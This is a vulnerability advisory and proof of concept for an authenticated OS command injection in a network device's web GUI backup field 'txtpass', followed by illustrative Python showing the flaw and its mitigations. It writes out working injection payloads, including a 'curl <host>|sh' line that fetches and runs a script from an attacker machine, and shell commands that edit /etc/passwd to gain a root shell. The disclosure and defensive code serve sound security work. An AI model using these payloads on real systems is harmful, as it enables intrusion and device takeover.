Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - CWE-78
Software Version: 2.4.16
NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-47900
CVSS: 8.8
Severity: High
Credits: Dario Emilio Bertani, Raffaele Bova, Andrea Sindoni, Simone Bossi, Antonio Carriero, Marco Manieri, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
The device doesn't correctly sanitize parameters used in the backup configuration functionality contained in the Web GUI. An attacker able to access the Web GUI can tamper with the “txtpass” field used to sign and download the backup file, and execute arbitrary shell commands.
Prerequisites: a user with valid credentials for the web application
Step-by-step instructions and PoC
A malicious user is able to download the configuration file from the device Web GUI. When the backup form is properly filled in and the "Download" button is clicked, an HTTP POST request is sent to /configbackuprestore. By manipulating the field “txtpass”, it was possible to inject the payload ";ping -c 10 <attacker_ip>;" (<attacker_ip> is the IPv4 address of the attacker), thereby altering the normal operation of the web server. Moreover, by exploiting this vulnerability it is possible to obtain access to the device as user “root”.
Affected Endpoints
Below is the evidence, with the vulnerability details and the payloads used.
Figure 1 - Payload used to exploit the vulnerability
This image shows that the content of the vulnerable parameter “txtpass” is modified to include the chosen shell command:
1234;ping -c 10 <attacker_IP>;
Then the command is executed (please note that dora is the hostname of our attacker machine).
Figure 2 - Evidence
In order to obtain a shell on the target device, a file “index.html” with the following content is created (please note that in the following example the user “exploit” has already been created by means of the available SSH access).
$ cat index.html
cp /etc/passwd /etc/passwd.exploit.bk
sed -i '$s|/usr/bin/kcli|/bin/sh|' /etc/passwd;
Then on the attacker machine a web server is set to listen on port 80:
root@dora:~# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Finally, the following command is injected:
1234;curl 163.162.217.40|sh;
The above command pipes the output of curl to sh, executing each line of our malicious file index.html.
The result is that the login shell kcli is replaced with sh. As shown in the image below, once we logged in over SSH we obtained an sh shell.
Evidence
Security Impact
A malicious user with access to the Web GUI of the device could inject a shell command to establish a reverse shell to the device and control it.
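The weakness behind this advisory is the classic CWE-78 pattern: a form field is interpolated into a shell command line. The following added example (hypothetical handler code, not the device's firmware; the signing tool name "sign_backup", the backup path and the injected value are constructed) shows the vulnerable construction beside two mitigations, an allow-list on the field and argv-style invocation without a shell, plus a check that confirms metacharacters reach the child process as literal text.

```python
"""Illustrative CWE-78 pattern for a backup-export handler (hypothetical code)."""
import re
import shlex
import subprocess
import sys

# Constructed injected value, modelled on the advisory's payload shape.
INJECTED = "1234;ping -c 10 198.51.100.7;"


def unsafe_command(txtpass: str) -> str:
    # Vulnerable pattern: the field is interpolated into a line that will be
    # handed to `sh -c`, so ';', '|', '$(...)' change what the shell runs.
    return f"sign_backup --password {txtpass} /tmp/config.bin"


def has_shell_metacharacters(value: str) -> bool:
    # Detection aid: flag values a logger or WAF rule should treat as suspicious.
    return re.search(r"[;|&`$<>\n\\]", value) is not None


def validated_password(txtpass: str) -> str:
    # Mitigation 1: allow-list the field (conservative charset, bounded length).
    if not 1 <= len(txtpass) <= 64 or not re.fullmatch(r"[A-Za-z0-9_@.\-]+", txtpass):
        raise ValueError("invalid backup password")
    return txtpass


def safe_argv(txtpass: str) -> list:
    # Mitigation 2: no shell at all. The value is a single argv element, so the
    # signing tool receives any metacharacters as literal bytes.
    return ["sign_backup", "--password", validated_password(txtpass), "/tmp/config.bin"]


def safe_shell_line(txtpass: str) -> str:
    # Fallback when a shell is unavoidable: shlex.quote makes the value one word.
    return f"sign_backup --password {shlex.quote(txtpass)} /tmp/config.bin"


def argv_survives_unchanged(value: str) -> bool:
    # Demonstrate argv passing with a harmless child: a Python process that
    # echoes its first argument back. No shell is involved, nothing is parsed.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout == value
```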